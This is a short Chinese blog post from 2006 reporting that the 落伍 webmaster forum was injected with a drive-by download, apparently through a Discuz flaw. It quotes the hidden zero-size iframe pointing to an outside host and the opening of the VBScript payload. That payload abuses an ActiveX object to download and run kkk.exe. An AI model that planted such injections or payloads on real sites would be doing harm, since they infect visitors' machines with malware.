标签 ‘落伍’ 下的日志

落伍被挂马了

2006/09/03 12:09 | 鬼仔 | 乱七八糟 | 消灭0回复

ps:在neeao和CN.Tink那里都看到了这个消息,我综合一下。估计是因为前两天DZ出的新洞被拿的,是一个叫freediscuz的论坛公布的漏洞,不过没有公布详细信息,只给了补丁。

看了下首页,有这么句,

<iframe src=http://www.lynndent.com/cf/style.htm width=0 height=0></iframe>

然后打开了这个地址..

代码包含

<script language="VBScript">
on error resume next
my = "http://www.lynndent.com/cf/kkk.exe"
Set CAOc = document.createElement("object")
CAOc.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

阅读全文 »

Tags: ,